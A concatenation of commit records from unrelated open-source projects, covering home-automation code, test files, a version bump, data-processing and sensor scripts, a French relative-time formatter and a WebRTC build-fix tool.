    @asyncio.coroutine
    def do(self, action):
        """Execute 'do' commands."""
        if action.startswith("speed:"):
            # BUG FIX: previously sliced action[11:], but "speed:" is only
            # 6 characters, so e.g. "speed:50" produced int("") and raised
            # ValueError. Strip exactly the "speed:" prefix.
            yield from self.set_speed(int(action[6:]))
        else:
            self.xknx.logger.warning(
                "Could not understand action %s for device %s",
                action, self.get_name())

    def state_addresses(self):
        """Return group addresses which should be requested to sync state."""
        state_addresses = []
        state_addresses.extend(self.speed.state_addresses())
        return state_addresses

    async def process_group_write(self, telegram):
        """Process incoming GROUP WRITE telegram."""
        await self.speed.process(telegram)

    def current_speed(self):
        """Return current speed of fan."""
        return self.speed.value

    def __eq__(self, other):
        """Equal operator."""
        return self.__dict__ == other.__dict__
| mit | Python |
|
eefa144b7a01f6beee1fcba30af32a967598d44f | add tests | sxslex/tabela_fipe,sxslex/tabela_fipe | tests/test_tabela_fipe.py | tests/test_tabela_fipe.py | # -*- coding: utf-8 -*-
#
# Copyright 2015 Alexandre Villela (SleX) <https://github.com/sxslex/sxtools/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# by sx.slex@gmail.com
from TabelaFipe import TabelaFipe
import unittest
# import pprint
class TestTabelaFipe(unittest.TestCase):
    """Integration tests for TabelaFipe lookups by FIPE code."""

    def test_01_get_by_codefipe(self):
        """A known FIPE code returns a populated dict."""
        table = TabelaFipe()
        response = table.get_by_codefipe('006008-9')
        self.assertIsInstance(response, dict)

    def test_02_get_by_codefipe_not_exists(self):
        """An unknown FIPE code yields None."""
        table = TabelaFipe()
        response = table.get_by_codefipe('111111-1')
        self.assertIsNone(response)
| apache-2.0 | Python |
|
a467cf8e92a783112bcecc82acf7b33c31282c49 | Bump to 3.2.0.rc2 | jsma/django-cms,nimbis/django-cms,netzkolchose/django-cms,FinalAngel/django-cms,iddqd1/django-cms,FinalAngel/django-cms,mkoistinen/django-cms,netzkolchose/django-cms,keimlink/django-cms,nimbis/django-cms,rsalmaso/django-cms,timgraham/django-cms,dhorelik/django-cms,yakky/django-cms,datakortet/django-cms,vxsx/django-cms,vxsx/django-cms,dhorelik/django-cms,dhorelik/django-cms,bittner/django-cms,jproffitt/django-cms,vxsx/django-cms,datakortet/django-cms,evildmp/django-cms,yakky/django-cms,jsma/django-cms,divio/django-cms,benzkji/django-cms,jsma/django-cms,divio/django-cms,datakortet/django-cms,bittner/django-cms,rsalmaso/django-cms,vxsx/django-cms,bittner/django-cms,mkoistinen/django-cms,czpython/django-cms,evildmp/django-cms,keimlink/django-cms,netzkolchose/django-cms,jproffitt/django-cms,benzkji/django-cms,czpython/django-cms,jproffitt/django-cms,SachaMPS/django-cms,benzkji/django-cms,SachaMPS/django-cms,iddqd1/django-cms,evildmp/django-cms,rsalmaso/django-cms,bittner/django-cms,evildmp/django-cms,timgraham/django-cms,netzkolchose/django-cms,timgraham/django-cms,nimbis/django-cms,czpython/django-cms,mkoistinen/django-cms,nimbis/django-cms,datakortet/django-cms,rsalmaso/django-cms,czpython/django-cms,benzkji/django-cms,iddqd1/django-cms,SachaMPS/django-cms,FinalAngel/django-cms,keimlink/django-cms,mkoistinen/django-cms,divio/django-cms,FinalAngel/django-cms,yakky/django-cms,jsma/django-cms,yakky/django-cms,divio/django-cms,jproffitt/django-cms | cms/__init__.py | cms/__init__.py | # -*- coding: utf-8 -*-
__version__ = '3.2.0.rc2'
default_app_config = 'cms.apps.CMSConfig'
| # -*- coding: utf-8 -*-
__version__ = '3.2.0.dev4'
default_app_config = 'cms.apps.CMSConfig'
| bsd-3-clause | Python |
68a7f9faf1933bb224113d9fa5d0ddd362b2e5ea | Add script to generate the site documentation containing the sizes of the binary shellcodes. | computerline1z/win-exec-calc-shellcode,computerline1z/win-exec-calc-shellcode,ohio813/win-exec-calc-shellcode,ohio813/win-exec-calc-shellcode | SizeDocGenerator.py | SizeDocGenerator.py | import os, re;
# I got the actual size of the binary code wrong on the site once - this script should help prevent that.
dsDoc_by_sArch = {"w32": "x86", "w64": "x64", "win": "x86+x64"};
with open("build_info.txt", "rb") as oFile:
iBuildNumber = int(re.search(r"build number\: (\d+)", oFile.read(), re.M).group(1));
print "Sizes (build %d)" % iBuildNumber;
for sArch in sorted(dsDoc_by_sArch.keys()):
sDoc = dsDoc_by_sArch[sArch];
iBinSize = os.path.getsize(r"build\bin\%s-exec-calc-shellcode.bin" % sArch);
iBinESPSize = os.path.getsize(r"build\bin\%s-exec-calc-shellcode-esp.bin" % sArch);
print " * %s: %d bytes (%d with stack allignment)" % (sDoc, iBinSize, iBinESPSize);
| bsd-3-clause | Python |
|
d59b7d8ea46d86169ffc9423de0a88b9c7c64774 | Create BalanceData.py | vidhyal/WitchMusic | Scikit/BalanceData.py | Scikit/BalanceData.py | #Copyright (c) 2016 Vidhya, Nandini
import os
import numpy as np
import operator
from constants import *
FIX_DEV = 0.00000001
rootdir = os.getcwd()
newdir = os.path.join(rootdir,'featurefiles')
def LoadData():
    """Load feature vectors and genre labels from the feature files.

    Returns a pair ``(features, labels)`` where both are dicts keyed by
    track id. Raises KeyError if any feature row is missing a label.
    """
    features = {}
    labels = {}
    # BUG FIX: the original left file handles open if parsing raised;
    # context managers guarantee the files are closed.
    # Each line: "<track_id> <f1> <f2> ... <fn>\n" (last token dropped —
    # it carries the trailing newline, matching the original slicing).
    with open(os.path.join(newdir, 'out_2.txt'), 'r') as data_file:
        for line in data_file:
            split_line = line.split(' ')
            track_id = split_line[0]
            features[track_id] = [float(element)
                                  for element in split_line[1:-1]]
    # Each line: "<track_id>\t<genre>\n"; keep only labels for known tracks.
    with open(os.path.join(newdir, 'labelout.txt'), 'r') as label_file:
        for line in label_file:
            split_line = line.split('\t')
            track_id = split_line[0]
            if track_id in features:
                labels[track_id] = split_line[1].split('\n')[0]
    # Sanity check retained from the original: every feature row must have
    # a label (KeyError otherwise).
    for key in features:
        if key not in labels:
            raise KeyError(key)
    return features, labels
def writeToFile(key, feature, fp):
    """Append one space-separated feature line for ``key`` to the file ``fp``.

    The line format is "<key> <f1> <f2> ...\\n" with each value rendered
    via "%f".
    """
    line = key
    for s in feature:
        line += " %f" % float(s)
    line += "\n"
    # BUG FIX: the original opened the file and never closed it, leaking a
    # handle per call; a context manager closes (and flushes) it reliably.
    with open(fp, 'a') as out_file:
        out_file.write(line)
def BalanceData(features, labels):
    """Split features per genre into train/test halves.

    For every genre in the global ``genres`` list, the first half of its
    tracks goes to training and the second half to testing. The track id is
    appended to each feature vector so it can be recovered later. Processed
    entries are removed from ``features``.

    Returns (genreFeat, numList, count, genreTestFeat).
    """
    if not os.path.exists('train'):
        os.makedirs('train')
    traindir = os.path.join(rootdir, 'train')
    if not os.path.exists('test'):
        os.makedirs('test')
    testdir = os.path.join(rootdir, 'test')
    count = 0
    # Opened for parity with the original script; writing is disabled there.
    testFile = open(os.path.join(testdir, 'testFile'), 'w+')
    genreFeat = {}
    numList = {}
    testFeat = {}
    trainFeat = {}
    genreTestFeat = {}
    for genre in genres:
        str1 = genre + '.txt'
        fout = open(os.path.join(traindir, str1), 'w+')
        delKey = []
        feature_list = []
        test_list = []
        subcount = 0
        # Collect all track ids belonging to this genre.
        for key in features:
            if labels[key] == genre:
                delKey.append(key)
                subcount = subcount + 1
        fout.close()
        count = count + subcount
        numList[genre] = subcount / 2
        if subcount != 0:
            # First half -> training set (track id appended in place).
            for key in delKey[:subcount / 2]:
                trainFeat[key] = features[key]
                trainFeat[key].append(key)
                feature_list.append(trainFeat[key])
            genreFeat[genre] = feature_list
            # Second half -> test set.
            for key in delKey[subcount / 2:]:
                testFeat[key] = features[key]
                testFeat[key].append(key)
                test_list.append(testFeat[key])
            genreTestFeat[genre] = test_list
        # Remove the consumed tracks so later genres don't revisit them.
        for key in delKey:
            del features[key]
    return genreFeat, numList, count, genreTestFeat
def ConvertToArrays(feats):
    """Flatten {genre: [[f1..fn, track_id], ...]} into parallel numpy arrays.

    Returns (features, labels, keys): feature rows without the trailing
    track id, one genre label per row, and the track ids.
    """
    features = []
    labels = []
    keys = []
    for genre, rows in feats.items():
        for row in rows:
            features.append(row[:-1])  # everything except the track id
            keys.append(row[-1])
            labels.append(genre)
    return np.asarray(features), np.asarray(labels), np.asarray(keys)
def GetData():
    """Load, balance and vectorize the dataset for training/evaluation.

    Returns (train_features, train_labels, test_features, test_labels,
    test_keys) as numpy arrays.
    """
    features, labels = LoadData()
    genreFeat, countGenre, count, genreTestFeat = BalanceData(features, labels)
    train_features, train_labels, train_keys = ConvertToArrays(genreFeat)
    test_features, test_labels, test_keys = ConvertToArrays(genreTestFeat)
    return train_features, train_labels, test_features, test_labels, test_keys
| mit | Python |
|
45b77de143a6ffcc46091d7879da4fa3009bc3e0 | add jm client | Zex/juicemachine,Zex/juicemachine,Zex/juicemachine | python/jm_client.py | python/jm_client.py | #!/usr/bin/python
#
# jm_client.py
#
# Author: Zex <top_zlynch@yahoo.com>
#
import dbus
import dbus.service
import dbus.mainloop.glib
import gobject
from basic import *
def start_request():
"""
Start sending requests to server
"""
connection = dbus.SessionBus()
obj = connection.get_object(
JM_SERVICE_NAME,
JM_CONFIG_PATH)
conf_iface = dbus.Interface(obj,
JM_CONFIG_IFACE)
print obj.Introspect()
print conf_iface.list()
start_request()
| mit | Python |
|
4ea6def1bdeb332b1f530f359a333e4f95078b2b | Update docstrings and link to docs | xifle/home-assistant,hmronline/home-assistant,jnewland/home-assistant,florianholzapfel/home-assistant,betrisey/home-assistant,badele/home-assistant,tinloaf/home-assistant,miniconfig/home-assistant,aoakeson/home-assistant,florianholzapfel/home-assistant,justyns/home-assistant,nkgilley/home-assistant,ct-23/home-assistant,alexmogavero/home-assistant,leppa/home-assistant,coteyr/home-assistant,JshWright/home-assistant,JshWright/home-assistant,GenericStudent/home-assistant,turbokongen/home-assistant,varunr047/homefile,HydrelioxGitHub/home-assistant,caiuspb/home-assistant,aoakeson/home-assistant,LinuxChristian/home-assistant,robbiet480/home-assistant,w1ll1am23/home-assistant,Smart-Torvy/torvy-home-assistant,keerts/home-assistant,tboyce1/home-assistant,hexxter/home-assistant,mKeRix/home-assistant,miniconfig/home-assistant,auduny/home-assistant,stefan-jonasson/home-assistant,sfam/home-assistant,dmeulen/home-assistant,nkgilley/home-assistant,mikaelboman/home-assistant,morphis/home-assistant,coteyr/home-assistant,Zyell/home-assistant,deisi/home-assistant,Zac-HD/home-assistant,open-homeautomation/home-assistant,nugget/home-assistant,srcLurker/home-assistant,MungoRae/home-assistant,LinuxChristian/home-assistant,sfam/home-assistant,PetePriority/home-assistant,philipbl/home-assistant,tboyce1/home-assistant,luxus/home-assistant,hexxter/home-assistant,jaharkes/home-assistant,HydrelioxGitHub/home-assistant,hmronline/home-assistant,shaftoe/home-assistant,open-homeautomation/home-assistant,tchellomello/home-assistant,jawilson/home-assistant,DavidLP/home-assistant,joopert/home-assistant,titilambert/home-assistant,balloob/home-assistant,partofthething/home-assistant,MungoRae/home-assistant,joopert/home-assistant,MungoRae/home-assistant,Duoxilian/home-assistant,stefan-jonasson/home-assistant,varunr047/homefile,srcLurker/home-assistant,molobrakos/home-assistant,adrienbrault/home-assistant,mezz64/home-assistant,
emilhetty/home-assistant,Theb-1/home-assistant,sffjunkie/home-assistant,stefan-jonasson/home-assistant,partofthething/home-assistant,MartinHjelmare/home-assistant,nevercast/home-assistant,GenericStudent/home-assistant,Theb-1/home-assistant,pschmitt/home-assistant,LinuxChristian/home-assistant,mezz64/home-assistant,luxus/home-assistant,emilhetty/home-assistant,happyleavesaoc/home-assistant,keerts/home-assistant,persandstrom/home-assistant,bdfoster/blumate,leoc/home-assistant,mKeRix/home-assistant,auduny/home-assistant,philipbl/home-assistant,nugget/home-assistant,ma314smith/home-assistant,instantchow/home-assistant,shaftoe/home-assistant,ma314smith/home-assistant,aronsky/home-assistant,aoakeson/home-assistant,aequitas/home-assistant,eagleamon/home-assistant,oandrew/home-assistant,Julian/home-assistant,Danielhiversen/home-assistant,Duoxilian/home-assistant,xifle/home-assistant,jaharkes/home-assistant,Zyell/home-assistant,alexmogavero/home-assistant,ewandor/home-assistant,varunr047/homefile,morphis/home-assistant,postlund/home-assistant,lukas-hetzenecker/home-assistant,Zac-HD/home-assistant,justyns/home-assistant,devdelay/home-assistant,ma314smith/home-assistant,sffjunkie/home-assistant,nnic/home-assistant,jabesq/home-assistant,aequitas/home-assistant,robjohnson189/home-assistant,eagleamon/home-assistant,tboyce1/home-assistant,varunr047/homefile,emilhetty/home-assistant,badele/home-assistant,bdfoster/blumate,oandrew/home-assistant,hmronline/home-assistant,alexmogavero/home-assistant,adrienbrault/home-assistant,tchellomello/home-assistant,jaharkes/home-assistant,rohitranjan1991/home-assistant,persandstrom/home-assistant,happyleavesaoc/home-assistant,turbokongen/home-assistant,sdague/home-assistant,mikaelboman/home-assistant,molobrakos/home-assistant,leoc/home-assistant,kyvinh/home-assistant,LinuxChristian/home-assistant,Smart-Torvy/torvy-home-assistant,bdfoster/blumate,FreekingDean/home-assistant,morphis/home-assistant,morphis/home-assistant,HydrelioxGitHub/home-assista
nt,oandrew/home-assistant,eagleamon/home-assistant,DavidLP/home-assistant,LinuxChristian/home-assistant,deisi/home-assistant,jamespcole/home-assistant,nevercast/home-assistant,devdelay/home-assistant,ct-23/home-assistant,Zac-HD/home-assistant,ma314smith/home-assistant,Duoxilian/home-assistant,aequitas/home-assistant,PetePriority/home-assistant,deisi/home-assistant,Cinntax/home-assistant,fbradyirl/home-assistant,Julian/home-assistant,Cinntax/home-assistant,auduny/home-assistant,mikaelboman/home-assistant,devdelay/home-assistant,Theb-1/home-assistant,hexxter/home-assistant,aronsky/home-assistant,sfam/home-assistant,instantchow/home-assistant,MartinHjelmare/home-assistant,PetePriority/home-assistant,caiuspb/home-assistant,rohitranjan1991/home-assistant,keerts/home-assistant,w1ll1am23/home-assistant,devdelay/home-assistant,shaftoe/home-assistant,miniconfig/home-assistant,MartinHjelmare/home-assistant,badele/home-assistant,robjohnson189/home-assistant,ct-23/home-assistant,emilhetty/home-assistant,tinloaf/home-assistant,qedi-r/home-assistant,eagleamon/home-assistant,leoc/home-assistant,MungoRae/home-assistant,open-homeautomation/home-assistant,persandstrom/home-assistant,deisi/home-assistant,lukas-hetzenecker/home-assistant,home-assistant/home-assistant,kyvinh/home-assistant,Zyell/home-assistant,mikaelboman/home-assistant,florianholzapfel/home-assistant,DavidLP/home-assistant,deisi/home-assistant,keerts/home-assistant,varunr047/homefile,mikaelboman/home-assistant,robbiet480/home-assistant,robjohnson189/home-assistant,kennedyshead/home-assistant,soldag/home-assistant,betrisey/home-assistant,tboyce021/home-assistant,robjohnson189/home-assistant,JshWright/home-assistant,luxus/home-assistant,kyvinh/home-assistant,Zac-HD/home-assistant,Duoxilian/home-assistant,srcLurker/home-assistant,jaharkes/home-assistant,qedi-r/home-assistant,betrisey/home-assistant,JshWright/home-assistant,ewandor/home-assistant,mKeRix/home-assistant,justyns/home-assistant,sffjunkie/home-assistant,dmeulen
/home-assistant,sffjunkie/home-assistant,MungoRae/home-assistant,kyvinh/home-assistant,sander76/home-assistant,shaftoe/home-assistant,sdague/home-assistant,balloob/home-assistant,betrisey/home-assistant,FreekingDean/home-assistant,tboyce021/home-assistant,Julian/home-assistant,jnewland/home-assistant,open-homeautomation/home-assistant,dmeulen/home-assistant,xifle/home-assistant,jnewland/home-assistant,philipbl/home-assistant,jamespcole/home-assistant,alexmogavero/home-assistant,florianholzapfel/home-assistant,kennedyshead/home-assistant,happyleavesaoc/home-assistant,fbradyirl/home-assistant,mKeRix/home-assistant,titilambert/home-assistant,sander76/home-assistant,bdfoster/blumate,xifle/home-assistant,Smart-Torvy/torvy-home-assistant,hexxter/home-assistant,toddeye/home-assistant,srcLurker/home-assistant,leoc/home-assistant,molobrakos/home-assistant,soldag/home-assistant,stefan-jonasson/home-assistant,tboyce1/home-assistant,Julian/home-assistant,miniconfig/home-assistant,caiuspb/home-assistant,Danielhiversen/home-assistant,bdfoster/blumate,ct-23/home-assistant,jamespcole/home-assistant,dmeulen/home-assistant,nnic/home-assistant,home-assistant/home-assistant,emilhetty/home-assistant,tinloaf/home-assistant,balloob/home-assistant,happyleavesaoc/home-assistant,jabesq/home-assistant,nnic/home-assistant,toddeye/home-assistant,Smart-Torvy/torvy-home-assistant,pschmitt/home-assistant,coteyr/home-assistant,Teagan42/home-assistant,jabesq/home-assistant,jawilson/home-assistant,ewandor/home-assistant,leppa/home-assistant,rohitranjan1991/home-assistant,hmronline/home-assistant,ct-23/home-assistant,instantchow/home-assistant,nevercast/home-assistant,sffjunkie/home-assistant,Teagan42/home-assistant,postlund/home-assistant,philipbl/home-assistant,hmronline/home-assistant,oandrew/home-assistant,nugget/home-assistant,fbradyirl/home-assistant | homeassistant/components/updater.py | homeassistant/components/updater.py | """
homeassistant.components.updater
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Component that checks for available updates.
For more details about this platform, please refer to the documentation at
at https://home-assistant.io/components/updater/
"""
import logging
import requests
from homeassistant.const import __version__ as CURRENT_VERSION
from homeassistant.const import ATTR_FRIENDLY_NAME
from homeassistant.helpers import event
_LOGGER = logging.getLogger(__name__)
PYPI_URL = 'https://pypi.python.org/pypi/homeassistant/json'
DEPENDENCIES = []
DOMAIN = 'updater'
ENTITY_ID = 'updater.updater'
def setup(hass, config):
""" Setup the updater component. """
def check_newest_version(_=None):
""" Check if a new version is available and report if one is. """
newest = get_newest_version()
if newest != CURRENT_VERSION and newest is not None:
hass.states.set(
ENTITY_ID, newest, {ATTR_FRIENDLY_NAME: 'Update Available'})
event.track_time_change(hass, check_newest_version,
hour=[0, 12], minute=0, second=0)
check_newest_version()
return True
def get_newest_version():
""" Get the newest Home Assistant version from PyPI. """
try:
req = requests.get(PYPI_URL)
return req.json()['info']['version']
except requests.RequestException:
_LOGGER.exception('Could not contact PyPI to check for updates')
return
except ValueError:
_LOGGER.exception('Received invalid response from PyPI')
return
except KeyError:
_LOGGER.exception('Response from PyPI did not include version')
return
| """
homeassistant.components.sensor.updater
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sensor that checks for available updates.
For more details about this platform, please refer to the documentation at
at https://home-assistant.io/components/sensor.updater/
"""
import logging
import requests
from homeassistant.const import __version__ as CURRENT_VERSION
from homeassistant.const import ATTR_FRIENDLY_NAME
from homeassistant.helpers import event
_LOGGER = logging.getLogger(__name__)
PYPI_URL = 'https://pypi.python.org/pypi/homeassistant/json'
DEPENDENCIES = []
DOMAIN = 'updater'
ENTITY_ID = 'updater.updater'
def setup(hass, config):
''' setup the updater component '''
def check_newest_version(_=None):
''' check if a new version is available and report if one is '''
newest = get_newest_version()
if newest != CURRENT_VERSION and newest is not None:
hass.states.set(
ENTITY_ID, newest, {ATTR_FRIENDLY_NAME: 'Update Available'})
event.track_time_change(hass, check_newest_version,
hour=[0, 12], minute=0, second=0)
check_newest_version()
return True
def get_newest_version():
''' Get the newest HA version form PyPI '''
try:
req = requests.get(PYPI_URL)
return req.json()['info']['version']
except requests.RequestException:
_LOGGER.exception('Could not contact PyPI to check for updates')
return
except ValueError:
_LOGGER.exception('Received invalid response from PyPI')
return
except KeyError:
_LOGGER.exception('Response from PyPI did not include version')
return
| apache-2.0 | Python |
3c65f2c4d7e40d55f5afae22c7912bba7d3eef7b | add french version | twidi/pytimeago | pytimeago/french.py | pytimeago/french.py | # -*- coding: utf-8 -*-
# pytimeago -- library for rendering time deltas
# Copyright (C) 2006 Adomas Paltanavicius
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
"""French language for pytimeago.
$Id$
"""
halfstr = u' et demi'
pluralstr = u's'
def french(delta, **kw):
"""French language for pytimeago. There are no keywords supported.
First, load utilities for testing:
>>> from test import *
The function accepts delta in seconds:
>>> french(0)
u'\\xe0 l\'instant'
>>> french(20)
u'\\xe0 l\'instant'
If delta falls in range 1..58 minutes, it is said so:
>>> french(hours(0, 1))
u'il y a 1 minute'
>>> french(hours(0, 5))
u'il y a 5 minutes'
>>> french(hours(0, 58))
u'il y a 58 minutes'
>>> french(hours(0, 59))
u'il y a 1 heure'
If delta is less than 24 hours, it is reported in hours with half-
periods:
>>> french(hours(3))
u'il y a 3 heures'
>>> french(hours(12, 25))
u'il y a 12 heures et demi'
Next, if delta is less than 7 days, it reported just so.
>>> french(days(6))
u'il y a 6 jours'
And also use half-periods:
>>> french(days(4) + hours(11))
u'il y a 4 jours et demi'
Special case for 1 day:
>>> french(days(1))
u'hier'
Less than four weeks, we say so:
>>> french(weeks(1))
u'il y a 1 semaine'
>>> french(days(8))
u'il y a 1 semaine'
>>> french(days(13))
u'il y a 2 semaines'
>>> french(weeks(3))
u'il y a 3 semaines'
>>> french(days(17))
u'il y a 2 semaines et demi'
Less than a year, say it in months:
>>> french(weeks(4))
u'il y a 1 mois'
>>> french(days(40))
u'il y a 1 mois et demi'
>>> french(days(29))
u'il y a 1 mois'
>>> french(months(2))
u'il y a 2 mois'
>>> french(months(11))
u'il y a 11 mois'
>>> french(days(70))
u'il y a 2 mois et demi'
We go no further than years:
>>> french(years(2))
u'il y a 2 ans'
>>> french(months(12))
u'il y a 1 an'
"""
# Now
if delta < 30:
return u'à l\'instant'
# < 1 hour
mins = delta/60
if mins < 1: mins=1
if mins < 59:
plural = mins > 1 and pluralstr or u''
return u'il y a %d minute%s' % (mins, plural)
# < 1 day
hours, mins = divmod(mins, 60)
if hours < 1: hours = 1
if hours < 23:
# "half" is for 30 minutes in the middle of an hour
if 15 <= mins <= 45:
half = halfstr
else:
half = u''
if mins > 45:
hours += 1
plural = hours > 1 and pluralstr or u''
return u'il y a %d heure%s%s' % (hours, plural, half)
# < 7 days
hours += round(mins/60.)
days, hours = divmod(hours, 24)
if days == 1:
return u'hier'
if days < 7:
half = 6 <= hours <= 18 and halfstr or u''
if 6 <= hours <= 18:
half = halfstr
else:
half = u''
if hours > 18:
days += 1
plural = days > 1 and pluralstr or u''
return u'il y a %d jour%s%s' % (days, plural, half)
# < 4 weeks
days += round(hours/24.)
weeks, wdays = divmod(days, 7)
if 2 <= wdays <= 4:
half = halfstr
else:
half = u''
if wdays > 4:
weeks += 1
if weeks < 4: # So we don't get 4 weeks
plural = weeks > 1 and pluralstr or u''
return u'il y a %d semaine%s%s' % (weeks, plural, half)
# < year
months, days = divmod(days, 30)
if 10 <= days <= 20:
half = halfstr
else:
half = u''
if days > 20:
months += 1
if months < 12:
return u'il y a %d mois%s' % (months, half)
# Don't go further
years = round(months/12.)
plural = years > 1 and pluralstr or u''
return u'il y a %d an%s' % (years, plural)
# Doctest
if __name__ == '__main__':
import doctest
doctest.testmod()
| lgpl-2.1 | Python |
|
01653b1130934b809816f7a5ad3c4b8c73d8d411 | Add a tool to fix (some) errors reported by gn gen --check. | TimothyGu/libilbc,ShiftMediaProject/libilbc,TimothyGu/libilbc,ShiftMediaProject/libilbc,TimothyGu/libilbc,TimothyGu/libilbc,TimothyGu/libilbc,ShiftMediaProject/libilbc,ShiftMediaProject/libilbc,ShiftMediaProject/libilbc | tools/gn_check_autofix.py | tools/gn_check_autofix.py | #!/usr/bin/env python
# Copyright (c) 2016 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
import os
import re
import shutil
import subprocess
import sys
import tempfile
from collections import defaultdict
TARGET_RE = re.compile(
r'(?P<indentation_level>\s*)\w*\("(?P<target_name>\w*)"\) {$')
class TemporaryDirectory(object):
def __init__(self):
self._closed = False
self._name = None
self._name = tempfile.mkdtemp()
def __enter__(self):
return self._name
def __exit__(self, exc, value, tb):
if self._name and not self._closed:
shutil.rmtree(self._name)
self._closed = True
def Run(cmd):
print 'Running:', ' '.join(cmd)
sub = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
return sub.communicate()
def FixErrors(filename, missing_deps, deleted_sources):
with open(filename) as f:
lines = f.readlines()
fixed_file = ''
indentation_level = None
for line in lines:
match = TARGET_RE.match(line)
if match:
target = match.group('target_name')
if target in missing_deps:
indentation_level = match.group('indentation_level')
elif indentation_level is not None:
match = re.match(indentation_level + '}$', line)
if match:
line = ('deps = [\n' +
''.join(' "' + dep + '",\n' for dep in missing_deps[target]) +
']\n') + line
indentation_level = None
elif line.strip().startswith('deps'):
is_empty_deps = line.strip() == 'deps = []'
line = 'deps = [\n' if is_empty_deps else line
line += ''.join(' "' + dep + '",\n' for dep in missing_deps[target])
line += ']\n' if is_empty_deps else ''
indentation_level = None
if line.strip() not in deleted_sources:
fixed_file += line
with open(filename, 'w') as f:
f.write(fixed_file)
Run(['gn', 'format', filename])
def Rebase(base_path, dependency_path, dependency):
base_path = base_path.split(os.path.sep)
dependency_path = dependency_path.split(os.path.sep)
first_difference = None
shortest_length = min(len(dependency_path), len(base_path))
for i in range(shortest_length):
if dependency_path[i] != base_path[i]:
first_difference = i
break
first_difference = first_difference or shortest_length
base_path = base_path[first_difference:]
dependency_path = dependency_path[first_difference:]
return (os.path.sep.join((['..'] * len(base_path)) + dependency_path) +
':' + dependency)
def main():
deleted_sources = set()
errors_by_file = defaultdict(lambda: defaultdict(set))
with TemporaryDirectory() as tmp_dir:
mb_gen_command = ([
'tools/mb/mb.py', 'gen',
tmp_dir,
'--config-file', 'webrtc/build/mb_config.pyl',
] + sys.argv[1:])
mb_output = Run(mb_gen_command)
errors = mb_output[0].split('ERROR')[1:]
if mb_output[1]:
print mb_output[1]
return 1
for error in errors:
error = error.splitlines()
target_msg = 'The target:'
if target_msg not in error:
target_msg = 'It is not in any dependency of'
if target_msg not in error:
print '\n'.join(error)
continue
index = error.index(target_msg) + 1
path, target = error[index].strip().split(':')
if error[index+1] in ('is including a file from the target:',
'The include file is in the target(s):'):
dep = error[index+2].strip()
dep_path, dep = dep.split(':')
dep = Rebase(path, dep_path, dep)
path = os.path.join(path[2:], 'BUILD.gn')
errors_by_file[path][target].add(dep)
elif error[index+1] == 'has a source file:':
deleted_file = '"' + os.path.basename(error[index+2].strip()) + '",'
deleted_sources.add(deleted_file)
else:
print '\n'.join(error)
continue
for path, missing_deps in errors_by_file.items():
FixErrors(path, missing_deps, deleted_sources)
return 0
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause | Python |
|
7084442bb78098f05acbe3243231243543061bf6 | Create gloabl_moran.py | jamaps/arcpy_scripts | gloabl_moran.py | gloabl_moran.py | import arcpy
arcpy.env.workspace = r"C:\Users\allenje4\Desktop\GGRC32 Lab 4 Files\GGRC32 Lab 4 Files\Local Statistics Data"
m =
arcpy.SpatialAutocorrelation_stats("pop_sci.shp", "PDens2011","NO_REPORT", "CONTIGUITY_EDGES_CORNERS", "#",)
| mit | Python |
|
bbc208548f0dd381f3045d24db3c21c4c8ee004e | Test all sensors at once | mmewen/UTSEUS-Binky,mmewen/UTSEUS-Binky,mmewen/UTSEUS-Binky,mmewen/UTSEUS-Binky,mmewen/UTSEUS-Binky | grovepi/scan.py | grovepi/scan.py | import time
import grove_i2c_temp_hum_mini # temp + humidity
import hp206c # altitude + temp + pressure
import grovepi # used by air sensor and dust sensor
import atexit # used for the dust sensor
import json
# Initialize the sensors
t= grove_i2c_temp_hum_mini.th02()
h= hp206c.hp206c()
grovepi.dust_sensor_en()
air_sensor = 0
grovepi.pinMode(air_sensor,"INPUT")
atexit.register(grovepi.dust_sensor_dis)
ret=h.isAvailable()
if h.OK_HP20X_DEV == ret:
print "HP20x_dev is available."
else:
print "HP20x_dev isn't available."
while True:
temp = h.ReadTemperature()
temp2 = t.getTemperature()
pressure = h.ReadPressure()
altitude = h.ReadAltitude()
humidity = t.getHumidity()
air_quality = "--"
# try:
# # Get dust
# [new_val,lowpulseoccupancy] = grovepi.dustSensorRead()
# if new_val:
# print lowpulseoccupancy
# except IOError:
# print ("Error")
try:
# Get air quality
air_quality = grovepi.analogRead(air_sensor)
if air_quality > 700:
print ("High pollution")
elif air_quality > 300:
print ("Low pollution")
else:
print ("Air fresh")
print ("air_quality =", air_quality)
except IOError:
print ("Error")
# Send result
data = {
"air_quality": air_quality,
"humidity": humidity,
"temperature": (temp + temp2) / 2,
"pressure": pressure,
"altitude": altitude
}
print json.dumps(data)
# with open('./json/hsk1.json', 'wb') as f:
# f.write(json.dumps(voc))
time.sleep(.5) | mit | Python |
|
c834082c59abe6ae6d2e065e1a5afac2d399a612 | Add unittests for the bridgedb.crypto module. | mmaker/bridgedb,pagea/bridgedb,mmaker/bridgedb,wfn/bridgedb,pagea/bridgedb,wfn/bridgedb | lib/bridgedb/test/test_crypto.py | lib/bridgedb/test/test_crypto.py | # -*- coding: utf-8 -*-
#
# This file is part of BridgeDB, a Tor bridge distribution system.
#
